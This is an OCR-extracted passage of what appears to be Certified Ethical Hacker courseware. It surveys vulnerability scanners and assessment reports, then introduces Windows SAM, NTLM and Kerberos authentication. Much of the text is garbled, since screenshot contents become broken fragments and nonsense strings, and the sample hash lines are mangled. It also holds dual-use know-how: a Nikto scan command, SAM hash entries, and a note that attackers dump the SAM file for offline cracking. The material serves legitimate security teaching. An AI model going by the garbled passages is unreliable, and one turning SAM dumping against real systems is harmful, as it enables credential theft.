Vulnerability Assessment Tools: Nessus Professional and GFI LanGuard Nessus
| Mar titoe contortion tee : Professional and malware
GFI
LanGuard |
cE H Pood beatla
Scans, detects, assesses, and rectifies security _
vulnerabilities ina network andconnected devices
SRE
seRvERZ019 (1010110)
AE
aR
°
‘etas/aruw tenable com
Module 05 Page 564
Tttps Janu aficom
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
Vulnerability Assessment Tools: OpenVAS and Nikto A framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability
Nikto
|
management solution
Aweb
CE H
server assessment tool that examines
a web serverto discover potential problems
and security vulnerabilities
@rrts ae?
Al Rights Reserved. Reproduction i
Other Vulnerability Assessment Tools RQ
&@
CE H
Qualys FreeScan eps. quals.com
beSECURE (AVDS) ‘tts: fae beyondsecurty.com
Acunetix Web Vulnerability Scanner ‘etps://rou.acunetixcom
Core Impact Pro -eeps:/ ae coresecurty.com
Nexpose p/w 0p? com
N-Stalker Web Application Security Scanner eps:/ anew stalker com
Network Security Scanner
Gisen7
‘spss
————"
haus,
beyond
secom
a SAINT
ei}
i
ManageEngine Vulnerability
= Manager Plus
_https://www.manageengine.com
Nipper Studio Se.
served Reproduction i
Vulnerability Assessment Tools An attacker performs vulnerability scanning to identify security loopholes in the target network that they can exploit to launch attacks. Security analysts can use vulnerability assessment tools to identify weaknesses present in the organization’s security posture and remediate the identified vulnerabilities before an attacker exploits them.
Module 05 Page 565
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
Network vulnerability scanners help to analyze and identify vulnerabilities in the target network or network resources by using vulnerability assessment and network auditing. These tools also assist in overcoming weaknesses in the network by suggesting various remediation techniques. The following are some of the most effective vulnerability assessment tools: Qualys Vulnerability Management
Source: https://www.qualys.com Qualys VM is a cloud-based service that gives immediate, global visibility into where IT systems might be vulnerable to the latest Internet threats and how to protect them. It helps to continuously identify threats and monitor unexpected changes in a network before they turn into breaches. Features: °
Agent-based detection
Also works with the unscannable assets. o
Qualys
Cloud
Agents,
extending
its network
coverage
to
Constant monitoring and alerts When VM is paired with Continuous Monitoring (CM), InfoSec teams are proactively alerted about potential threats, so problems can be tackled before they turn into breaches.
o
Comprehensive coverage and visibility Continuously scans and identifies vulnerabilities for protecting IT assets onpremises, in the cloud, and at mobile endpoints. Its executive dashboard displays an overview of the security posture and gives access to remediation details. VM generates custom, role-based reports for multiple stakeholders, including automatic security documentation for compliance auditors.
o
VM for the perimeter-less world As enterprises adopt cloud computing, mobility, and other disruptive technologies for digital transformation, Qualys VM offers next-generation vulnerability management for these hybrid IT environments whose traditional boundaries have been blurred.
o
Discover forgotten devices and organize the host assets Qualys can help quickly determine what is running in different parts of the network—from the perimeter and corporate network to virtualized machines and cloud services. It can also identify unexpected access points, web servers, and other devices that can expose the network to attack.
©
Scan for vulnerabilities everywhere, accurately and efficiently Scan systems anywhere from the same console, including the perimeter, the internal network, and cloud environments.
Module 05 Page 566
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis o
Exam 312-50 Certified Ethical Hacker
Identify and prioritize risks Qualys, using trend analysis, Zero-Day, the highest business risks.
o
and
Patch
impact predictions, can
identify
Remediate vulnerabilities Qualys’s ability to track vulnerability data across hosts and time produces interactive reports that provide a better understanding of the security of the network.
@ ouaiys December 25
Vulnerability Scorecard Report
(Erm)
Vulnerability Scorecard Report_system_PO_displayedAll
Source Business Unit Operating System A Results
Vulnerability Distribution by Type
Vulnerability Distribution by Severity Level
. . ore ore ‘Asset Groups
Title
The subnet
Leveld
72178) Fe
1800, a
10
Emety
Severites by Levels,
LevelS
Hosts
1
28 2 8 5
te
‘Vulnerability Type
1G
Potentiat
dreary
Levelt
Confirmed
1783,«1783—«1783
ms 59
ToT sms
3076
6
Level?
Level3
Pe
Cr)
Potent
ee
°
ee) °
°
0
0
6
68
1
a
2
% © New
Total
Vulnerability Status Active
Fixed
68,268 24
ReOpen
‘Vulnerability Age by Days >60
>30
>90
mw o © w
Cn er rd
ee)
28 Ea
a
a)
%®
0
o
3
12 Ea
0
«8
mo
0
°
me
0
0
Eq
1
0
88%
86a
6
Figure 5.7: Vulnerability scanning using Qualys Vulnerability Management
Nessus Professional Source: https://www.tenable.com Nessus Professional is an assessment solution for identifying vulnerabilities, configuration issues, and malware that attackers use to penetrate networks. It performs vulnerability, configuration, and compliance assessment. It supports various
technologies
such
as operating
systems,
network
devices,
hypervisors,
databases,
tablets and phones, web servers, and critical infrastructure.
Nessus is the vulnerability scanning platform for auditors and security analysts. Users can schedule scans across multiple scanners, and use wizards to easily and quickly create policies, schedule scans, and send results via email.
Module 05 Page 567
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
Features:
o
High-speed asset discovery
o
Vulnerability assessment
o
Malware and Botnet detection
o
Configuration and compliance auditing
o
Scanning and auditing virtualized and cloud platforms
6 Configure
Audit
© Trail
-
a
&
®
launch»
=
Repo
Vulnerabilities 34 Count =
ssucertfics..
General
SL Certificat..
General
SSL Cipher Bl. .
General
Scan Details
1
Vulnerabilities
Zywel Routers and Home Wifi Systems: Unprotected feed More
Figure 5.8: Vulnerability scanning using Nessus
=
GFI LanGuard Source: https://www.gfi.com GFI LanGuard scans for, detects, assesses, and rectifies security vulnerabilities in a network and its connected devices. This is done with minimal administrative effort. It scans the operating systems, virtual environments, and installed applications through vulnerability check databases. It enables analysis of the state of network security, identifies risks, and offers solutions before the system can be compromised. Features:
o
Patch management for operating systems and third-party applications
o
Vulnerability assessment
Module 05 Page 568
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
o
AWeb reporting console
o
Track latest vulnerabilities and missing updates
o
Integration with security applications
o
Network device vulnerability checks
o
Network and software auditing
o
Support for virtual environments
GF LanGuard HER >
[> | dasttonrd|
You’ Fiter cap
@ seach
+ & Entre Network
scan
@© Overview
Q Matware Protection Issue @ unaumorized Appicatons
B cmeesrcsredpense, —||@ ana sues Som soa hosts
Agent Stats ‘Aaert Not Intalled *» etl cuca
SSiolepies ecaronre stein eases
Vuberbity Trend Over Tne =
© Sotwae
=» Hardware
@ Sytem . :
SERVERZOTS 1010119 2ss018250F
Sen ky
A
a
tv} Firewall Issues
4B trtamcnet =
:
Configuration
SERVER2019 (10.10.1.19)
Valeriy Level
a
Reports
x
vila
=
| tases ssciaaeenry
+ scan actnty [Remedaton Actty]
Reals Stats {A Other Vinerabites: 2 (5 Cth) Potential Vuinerabitties: 61
SSCS
B
a
@ hnstated Aopleations: 25 (0 unauthorized)
{%j Open Potts: 7 Shame: &
*
=
a
Figure 5.9: Vulnerability scanning using GFl LanGuard
OpenVAS
Source: https://www.openvas.org OpenVAS is a framework of several services and tools that offer a comprehensive and powerful vulnerability scanning and vulnerability management solution. The framework is part of Greenbone Network’s commercial vulnerability management solution,
developments from which have been contributed to the open-source community since 2009. The actual security scanner is accompanied by a regularly updated feed of Network Vulnerability Tests (NVTs), over 50,000 in total.
Module 05 Page 569
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
i
ed @ Start @ Parrot
Community
@ D
Git @ cryptP
y
Dashboards
EB Learn
Configuration
@¥OA RepoThu,
rt:
Information
sD UTC
Results
Hosts
(40f46)
Administration
iter
Mar 31, 2022
4:03 AM
©
Ports
(ofl)
(of a7)
x
Applications
(0 of0)
419-8
Operating
bd
CVEs
Systems (ort)
Closed
(Gof — CVEs x (@ ore
TLS
Certificates (oly
Error
User
Messages (0 of 0)
Tags @ 1-40f4
‘Vulnerability
Location
Report outdated / end-oflife Scan Engine / Environment (local) DCE/RPC and MSRPC Services Enumeration Reporting ‘SSL/TLS: iets Deprecated TLSv1.0 and TLSv1.1 Protocol ‘TcP timestamps
=O
evs teel
Toe
z,
Tore
Created
97% 1010.22
generainep Thu; Mar
80%
—10.10.1.22
135/tep
98%
10.10.1.22
3389p
80%
—10.10.1.22
generaljtep
Thu, 4:13 Thu, 4:39 Thu, 4:04
32,2022
Mar 31, 2022 AM UTC Mar 31, 2022 AM UTC Mar 31, 2022 AM UTC 1-40f4
Figure 5.10: Vulnerability scanning using OpenVAS
=
Nikto Source: https://cirt.net Nikto is an Open Source (GPL) web server scanner that performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files or programs, checks for outdated versions of over 1250 servers, and checks for version specific problems on over 270 servers. It also looks at server configuration items such as the presence of multiple index files and the HTTP server options and will attempt to identify installed web servers and software. Features:
o oA
SSL Support (Unix with OpenSSL or maybe Windows with ActiveState’s Perl/NetSSL) full HTTP proxy support
o
Checks for outdated server components
oO.
Saves reports in plain text, XML, HTML, NBE or CSV
o
ATemplate engine to easily customize reports
o
Scans multiple ports on a server, or multiple servers via input file
o
LibWhisker’s IDS encoding techniques
Module 05 Page 570
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Vulnerability Analysis o
Identifies installed software via headers, favicons, and files
©
Host authentication with Basic and NTLM
o
Subdomain guessing
o
Apache and cgiwrap username enumeration
©
Scan tuning to include or exclude entire classes of vulnerability checks
©
Guesses credentials for authorization realms (including many default ID and password combinations)
re
nikto -h www.certifiedhacker.com Nikto v2.1.6
Target Target Target Start
IP Hostname Port Time
-Tunin
241.216.11 rtifiedhacker.com
GMT-4
03-31 07:32:51
nginx/1.19.10 The anti-clickjacking X-Frame-Options header is not pres nt The X-XSS-Pr n header is ni defined. This header hint to the S st some forms Uncommon
tents HIT nts true
found found
he
header
r agent to protect again
Uncommon header 'x Uncommon header ‘ho: found, contents kLmJsdWVob3NOLmN The X-Content-Type-Options header is not Thi could allow the user agent to render the content of the site in a different fashion to the MIME type Server banner has changed from ‘nginx/1.19.10 to ‘Apache’ which may suggest a WAF, load balancer c proxy
is in plac
rtifiedhacker.zip
Allowed
HTTP
Methods:
Potentially
OPTIONS,
inte
HEAD,
archive/cert
GET
file found
bmail/blank.html: IlohaMail 0.8.10 c an XSS vulnerability. ript vulnerabilitie Web er Contro Panel ed mail f age instal ed ‘mailman/listinfc
OSVDB-3268 @ nikt
cpanel
Web-based ory
Mailman
indexing
found
rol panel
on
the
Previous
versions
contain othe
server
found
tifiedh.
Figure 5.11: Screenshot of Nikto Listed below are some of the additional vulnerability assessment tools:
=
Qualys FreeScan (https://www.qualys.com)
=
Acunetix Web Vulnerability Scanner (https://www.acunetix.com)
=
Nexpose (https://www.rapid7.com)
=
Network Security Scanner (https://www.beyondtrust.com)
=
SAINT (https://www.carson-saint.com)
=
beSECURE (AVDS) (https://www.beyondsecurity.com)
Core Impact Pro (https://www.coresecurity.com) Module 05 Page 571
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
=
N-Stalker Web Application Security Scanner (https://www.nstalker.com)
=
ManageEngine Vulnerability Manager Plus (https://www.manageengine.com)
=
Nipper Studio (https://www.titania.com)
Vulnerability Assessment Tools for Mobile =
Vulners Scanner Source: https://vulners.com Vulners scanner is an Android application that performs passive vulnerability detection based on a software version’s fingerprint. Since this is a passive method of vulnerability assessment, this app can only be used to identify vulnerabilities; it is not effective in performing compliance checks. €
Share scan result
J
Risk | Critical
Score
php - 5.6.31
nginx - 1.14.0 jQuery Migrate -
1.2.1
Figure 5.12: Vulners Scanner — critical risk score
Module 05 Page 572
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
Vulners Scanner
Risk
(Medi
co)
History Figure 5.13: Vulners Scanner — medium risk score
=
SecurityMetrics Mobile
Source: https://www.securitymetrics.com SecurityMetrics Mobile is a mobile defense tool that helps to identify mobile device vulnerabilities to protect customers’ sensitive data. It helps to avoid threats that originate from mobile malware, device theft, Wi-Fi network connectivity, data entry, personal and business use, unwarranted app privileges, data and device storage, account data access, Bluetooth, Infrared (IR), Near-field communication (NFC), and SIM and SD cards.
SecurityMetrics MobileScan complies with PCI SSC (Payment Card Industry Security Standards Council) guidelines to prevent mobile data theft. On completion of a scan, the report generated comprises a total risk score, a summary of discovered vulnerabilities, and recommendations on how to resolve threats.
Module 05 Page 573
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Vulnerability Analysis
securityMETRICS'
Mobile
PCI Issues Your device is not compliant. 25.70
EXi
Total Risk Score
Non-market App Installation
Non-market apps can be installed on this device.
YAM
USB Debugging
USB debugging is enabled, which could unintentionally expose sensitive data, ER:
OS Vulnerabilities
©Check
B
bo
Pcistatus
Settings
Figure 5.14: SecurityMetrics Mobile — Risk Score
MOVs
securityMETRICS unavailable on this device.
|
11:28 AM
Mobile
Password Policy
This device is protected by a passcode.
|
Disk Encryption
The device has on-disk encryption enabled for added data security |
Operating System Integrity
This device is running Android 6.0.1
App Version
|
The current version of MobileScan is installed.
©heck
B Pci status
%Settings
Figure 5.15: SecurityMetrics Mobile — result
Module 05 Page 574
| Hacking and Countermeasures Copyright © by EC-Col All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
CEH
LO#04: Analyze Vulnerability Assessment Reports
Copyright © by
Al RightsReserved. Reprodu
Vulnerability Assessment Reports W
CE H
The vulnerability assessment report discloses the risks detected after scanning a network The report alerts the organization of possible attacks and suggests countermeasures
]
Information available in the reports is used to fix security flaws
IB
Vulnerability Assessment Report
Executive Summary
Assessment Overview
Findings
Risk Assessment
Recommendations Strictly Prohibited
Vulnerability Assessment Reports In the vulnerability assessment process, once all the phases are completed, the security team will review the results and process the information to prepare the final report. In this phase, the security team will try to disclose any identified vulnerabilities, document any variations and findings, and include all these in the final report along with remediation steps to mitigate the identified risks. Module 05 Page 575
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
The vulnerability assessment report discloses the risks that are detected through scanning the network. Tools such as Nessus Professional, GFI LanGuard, and Qualys Vulnerability Management are used for vulnerability assessment. These tools provide a comprehensive assessment report in a specified format. The report alerts the organization to possible attacks
and suggests countermeasures.
The report provides details of all the possible vulnerabilities with regard to the company’s security policies. The vulnerabilities are categorized based on severity into three levels: High, Medium, and Low risk. High-risk vulnerabilities are those that might allow unauthorized access to the network. These vulnerabilities must be rectified immediately before the network is compromised. The report describes different kinds of attacks that are possible given the organization’s set of operating systems, network components, and protocols. The vulnerability assessment report must include, but are not limited to, the following points:
=
The vulnerability's name and its mapped CVE ID
=
The date of discovery
=
The score based on Common Vulnerabilities and Exposures (CVE) databases
= A detailed description of the vulnerability =
The impact of the vulnerability
=
Details regarding the affected systems
=
Details regarding the process needed to correct the vulnerability, including information patches, configuration fixes, and ports to be blocked.
= A proof of concept (PoC) of the vulnerability for the system (if possible)
Vulnerability Assessment Report
Executive Summary
Assessment Overview
Findings
Risk Assessment
Recommendations
Figure 5.16: Components of a vulnerability assessment report
Module 05 Page 576
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis
Components
Exam 312-50 Certified Ethical Hacker
of a Vulnerability Assessment Report
@ Executive Summary
@ Findings
© Assessmentscope and
© Prioritization of remediation based on
© Types of vulnerabilities identified
@ Testing narrative
the risk ranking
.
© Action plan to implement the
© Detailed information on identified vulnerabilities
@ Findings summary
@
@ Remediation summary
@ Assessment Overview
@ Recommendations
© Scanned hosts
objectives
recommendations for each identified vulnerability
Notes describing additional
details of scan results
© Classification of vulnerabilities based on the risk level
i ® ‘Scan information @ Target information
© Root-cause analysis @ Application of patches/fixes
© Risk Assessment
@ Assessment methodology
CE H
© Lessons learned @ Awareness training
© Potential vulnerabilities that can v compromise the system or
@ Implementation of periodic vulnerability i‘
© Critical hosts with severe vulnerabilities
© Implementation of policies, procedures, and controls
application
assessmen
Components of a Vulnerability Assessment Report A vulnerability assessment report provides detailed information regarding the vulnerabilities found in the computing environment. The report helps organizations identify the security posture of computing systems (such as web servers, firewalls, routers, email, and file services) and provide solutions to reduce system failures. An ethical hacker must be careful when analyzing vulnerability assessment reports to avoid false positives.
The assessment report helps organizations take mitigation steps to avoid risk proactively by identifying, tracking, and eliminating security vulnerabilities.
Vulnerability assessment reports are classified into two types: =
Security vulnerability reports
=
Security vulnerability summaries
Security Vulnerability Report
This is a combined report of all the scanned devices and servers in the organization’s network. The security vulnerability report includes the following details: =
Newly found vulnerabilities
=
Open ports and detected services
=
Suggestions for remediation
=
Links to patches
Module 05 Page 577
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
Security Vulnerability Summary This report is produced for every device or server after scanning. It provides a summary of the scan result, which includes the following elements: =
Current security flaws
=
Categories of vulnerabilities
=
Newly detected security vulnerabilities
=
Severity of vulnerabilities
=
Resolved vulnerabilities
Avulnerability assessment report covers the following elements: =
Executive Summary
o
Assessment scope and objectives Purpose of the vulnerability scanning Scope of the scanning
o.
Testing narrative
Operating systems upon which scanning is performed IP addresses upon which scanning is performed Types of scans performed Date and time (Including start, end, and duration of scan)
o
Findings summary Critical vulnerabilities identified (highlights based on risk level) Y
Number of vulnerabilities based on severity (graphical representation)
Identified operating systems Performance of the systems and applications during the scan Overall risk level Critical issues that need to be addressed o =
Remediation summary
Assessment Overview
o
Assessment methodology
o
Scan information: information such versions, and the assets scanned.
o
Target information: Information about the target system’s name and address.
Module 05 Page 578
as the type
of scan
performed,
tools
used,
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis =
Exam 312-50 Certified Ethical Hacker
Findings °
Scanned hosts, including each host’s detailed information e
: Name and address of the host
e
: Operating system type
e
: Date of the test
e
Vulnerable services: Network services by their names and ports.
Types of vulnerabilities identified Detailed information on identified vulnerabilities (including CVE threat description, impact caused, remediation, and exploitability) °
=
=
ID, CVSS
score,
Notes describing additional details of scan results
Risk Assessment °
Classification of vulnerabilities based on the risk level: critical, high, moderate, low
°
Potential vulnerabilities that can compromise the system or application
°
Critical hosts with severe vulnerabilities
or
Recommendations ©
Prioritization of remediation based on the risk ranking
©
Action plan to implement vulnerability
co
Root-cause analysis
©
Application of patches/fixes
o
Lessons learned
o
Awareness training
o
Implementation of periodic vulnerability assessment
o
Implementation of policies, procedures, and controls
Module 05 Page 579
the
recommendations/remediation
for each
identified
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
Module Summary a
CE H
Q In this module, we have discussed: > The definition of vulnerability research, vulnerability assessment, and vulnerability management life cycle The CVSS vulnerability scoring system and databases Various types of vulnerabilities and vulnerability assessment techniques
vVvvyv
rt]
>
Various vulnerability assessment solutions, along with their characteristics
Various tools that are used to test a host or application for vulnerabilities, along with the criteria and best practices for selecting the tool We concluded with a detailed discussion on how to analyze a vulnerability assessment report and how it discloses the risks detected after scanning the network
Q Inthe next module, we will discuss the methods attackers, as well as ethical hackers and pen testers, utilize to hack a system based on the information collected about a target of evaluation; for example, footprinting, scanning, enumeration, and vulnerability analysis phases
Module Summary This module discussed vulnerability research, vulnerability assessment, and the vulnerabilitymanagement life cycle. It also discussed the CVSS vulnerability scoring system and databases and various types of vulnerabilities and vulnerability assessment techniques. It described various vulnerability assessment solutions along with their characteristics and described various vulnerability assessment tools that are used to test a host or application for vulnerabilities, along with the criteria and best practices for selecting the tool. Finally, this module ended with a detailed discussion on how to analyze a vulnerability assessment report and how it discloses the risks detected after scanning a network. The next module will show how attackers, as well as ethical hackers and pen testers, attempt system hacking based on the information collected about a target in the footprinting, scanning, enumeration, and vulnerability analysis phases.
Module 05 Page 580
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
C\EH
EC-Council
Certified |) Ethical Hacker
———
MODULE 06 SYSTEM HACKING ———
EC-COUNCIL OFFICIAL CURRICULA
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
CEH
o
LO#01: Demonstrate Different Password Cracking and Vulnerability Exploitation Techniques to Gain Access to the System LO#02: Use Different Privilege Escalation Techniques to Gain Administrative Privileges
o
o
LEARNING
OBJECTIVES
LO#03: Use Different Techniques to Hide Malicious Programs and Maintain Remote Access to the System LO#04: Demonstrate Techniques to Hide the Evidence of Compromise
Copyright © by
Al RightsReserved. Rep
Learning Objectives System hacking is one of the most important, and sometimes, the ultimate goal of an attacker. The attacker acquires information through techniques such as footprinting, scanning, enumeration, and vulnerability analysis and then uses this information to hack the target system. This module will focus on the tools and techniques used by an attacker to hack the
target system.
At the end of this module, you will be able to do the following: =
Explain the different techniques to gain access to a system
=
Apply privilege escalation techniques
=
Explain different techniques to gain and maintain remote access to a system
=
Describe different types of rootkits
=
Explain steganography and steganalysis techniques
=
Apply different techniques to hide the evidence of compromise
=
Apply various system hacking countermeasures
Module 06 Page 583
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
CEH
LO#01: Demonstrate Different Password Cracking and Vulnerability Exploitation Techniques to Gain Access to the System
Copyright © by
Al RightsReserved, Reproduction
i Strictly Prohibited.
Gaining Access As discussed in Module 01, the CEH hacking methodology (CHM) includes various steps attackers follow to hack systems. The following sections discuss these steps in greater detail. The first step involves the use of various techniques by attackers to gain access to the target system. These techniques include cracking passwords, exploiting buffer overflows, and exploiting identified vulnerabilities.
Module 06 Page 584
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Microsoft Authentication
CE H winds Sey
Security Accounts Manager (SAM) Database
Enter network credentials
. + 1, Windows stores user passwords .in SAM, or in. the Active Directory
Enter your credentials to connect to: SERVER2O19
database in domains. Passwords are never stored in clear text and are hashed, and the results are stored in the SAM
I
NTLM Authentication
The NTLM authentication protocol types are as follows: NTLM authentication protocol and LM authentication protocol These protocols store the user’s password in the SAM database using
different hashing methods
Remember my cece The username or pasword is incorrect fx
Cancel
ig Windows 11
Kerberos Authentication
Microsoft has upgraded its default authentication protocol to
Kerberos which provides a stronger authentication for client/server
applications than NTLM
Cracking Passwords Microsoft Authentication When users log in to a Windows computer, a series of steps are performed for user authentication. The Windows OS authenticates its users with the help of three mechanisms (protocols) provided by Microsoft. Security Accounts Manager (SAM) Database Windows
uses
the
Security
Accounts
Manager
(SAM)
database
or Active
Directory
Database to manage user accounts and passwords in hashed format (a one-way hash). The system does not store the passwords in plaintext format but in a hashed format, to protect them from attacks. The system implements the SAM database as a registry file, and the Windows kernel obtains and keeps an exclusive filesystem lock on the SAM file. As this file consists of a filesystem lock, this provides some measure of security for the storage of passwords. It is not possible to copy the SAM file to another location in the case of online attacks. Because the system locks the SAM file with an exclusive filesystem lock, a user cannot copy or move it while Windows is running. The lock does not release until the system throws a blue screen exception, or the OS has shut down. However, to make the password hashes available for offline brute-force attacks, attackers can dump the ondisk contents of the SAM file using various techniques. The SAM file uses an SYSKEY function (in Windows NT 4.0 and later versions) to partially encrypt the password hashes.
Module 06 Page 585
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Even if hackers use subterfuge techniques to discover the contents, the encrypted keys with
a one-way
hash
make
it difficult
to
hack.
In addition,
some
versions
have
a
secondary key, which makes the encryption specific to that copy of the OS. =
NTLM Authentication NT LAN Manager (NTLM) is a default authentication scheme that performs authentication using a challenge/response strategy. Because it does not rely on any official protocol specification, there is no guarantee that it works effectively in every situation.
Furthermore,
it has
been
used
in
some
Windows
installations,
where
it
successfully worked. NTLM authentication consists of two protocols: NTLM authentication protocol and LAN Manager (LM) authentication protocol. These protocols use different hash methodologies to store users’ passwords in the SAM database.
=
Kerberos Authentication Kerberos is a network authentication protocol that provides strong authentication for client/server applications through secret-key cryptography. This protocol provides mutual authentication, in that both the server and the user verify each other’s identity. Messages sent through Kerberos protocol are protected against replay attacks and eavesdropping.
Kerberos employs the Key Distribution Center (KDC), which is a trusted third party. This consists of two logically distinct parts: an authentication server (AS) and a ticketgranting server (TGS). Kerberos uses “tickets” to prove a user’s identity.
Microsoft has upgraded its default authentication protocol to Kerberos, which provides a stronger authentication for client/server applications than NTLM.
GF
x
windows security
Enter network credentials Enter your credentials to connect to: SERVER2019
assword
Remembermy credentials The username or password is incorrect.
Figure 6.1: Screenshot of Windows authentication
Module 06 Page 586
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
How Hash Passwords Are Stored in Windows
Fi ded ae
mone
a> OFet
SAM?
|
Password hash using LM/NTLM #44: 0CB6948805F797BF2A82807973B89537:
::
c: \windows\system32\config\SAM
How Hash Passwords Are Stored in Windows SAM? Windows OSs use a Security Account Manager (SAM) database file to store user passwords. The SAM file is stored at %SystemRoot%/system32/config/SAM in Windows systems, and Windows mounts it in the registry under the HKLM/SAM registry hive. It stores LM or NTLM hashed passwords. i
=
my
po,
5
bed
Shiela/test
a=,
hy
Password hash using LM/NTLM
Shiela:1005:NO
PASSWORD*##k AiR ERR
+ * : 0CB6948805F797BF2A82807973B89537: : :
Figure 6.2: Storing a user password using LM/NTLM hash
NTLM supersedes the LM hash, which is susceptible to cracking. New versions of Windows still support LM hashes for backward compatibility; however, Vista and later Windows versions disable LM hashes by default. The LM hash is blank in the newer versions of Windows. Selecting the option to remove LM hashes enables an additional check during password change operations but does not immediately clear LM hash values from the SAM. The SAM file stores a “dummy” value in its database, which bears no relationship to the user’s actual password and is the same for all user accounts. It is not possible to calculate LM hashes for passwords exceeding 14 characters in length. Thus, the LM hash value is set to a “dummy” value when a user or administrator sets a password of more than 14 characters.
Module 06 Page 587
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
‘System Hacking
c: \windows\system32\config\SAM Administrator:500:NO PASSWORD***# si sGieinink ik: 61880B9EE373475C8148A7108ACB3031: Guest:501:NO PASSWORD*#* #4 #4 ks eke REE ENO PASSWORDE EI a ky Admin:1001:NO
PASSWORD** **# #4 +i tit
CC:
BE4OC450AB9971 3DFLEDCSB40C25AD47:
Martin:1002:NO
PASSWORD****#*# #4
kkk
: BFAA50 2DA294ACBC17 5B394A080DEE79
Juggyboy:1003:NO
Jason:1004:NO
PASSWORD*******##e## ee RHEE 2 ABBCDCDD22253127 93ED6967B28C1025:
PASSWORD** #4 i ii ee eH
[fo PASSWORD* ARR aaa AHHH)
voeyv
Username
User ID
3:
HK: 2D20D25 247 9F48SCDF5E171D9398 SBE:
CBO948305E797TBEZA82807973B8953 5 : +
v
v
LM Hash
NTLM Hash Figure 6.3: SAM file
Note: LM hashes are disabled in Windows Vista and later Windows OSs; LM is blank in those systems.
Module 06 Page 588
Ethical Hacking and Countermeasures Copyright © by EC-Cot All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
NTLM Authentication Process
CE H Windows Domain Controller
eon
User types password into logon window
‘Windows runs
password through
hash algorithm,
Domain controller has a stored copy of the user's hashed password hash
Shiela: 1005:NO PASSWORD****
wn Shiela:
1005:NO
saeeeeeeenaaenees :0CB694880 SE797BE2A82807973889537:
PASSWORD****
seeseesseenneeescoae3t080
DC compares computer's response with the response it created with its own hash
Computer sends response to challenge Note: Microsoft has upgraded its default authentication protocol to Kerberos, which provides stronger authentication for client/server applications than NTLM.
NTLM Authentication Process NTLM includes three methods of challenge-response authentication: LM, NTLMv1, and NTLMv2, all of which use the same technique for authentication. The only difference between them is the level of encryption. In NTLM authentication, the client and server negotiate an authentication protocol. This is accomplished through the Microsoft-negotiated Security Support Provider (SSP).
=| User types password
Into logon window
Windows runs
password through hash algorithm
Client Computer
Windows Domain Controller
Fy
Domain controller has a stored copy
Shiela
of the user's hashed password
por rrr tress
Shiela:1005:NO PASSWORD*:
Mach
Alport ®
Shiela:1005:No PAssWorD+++
ionenneaaenasae+4; OCB6I4880 5F797BE2A62007973B89537
seeeseussaeeens4s:0CB694880
5F797BF2A82807973B89537:
|
: :
DC compares computer's
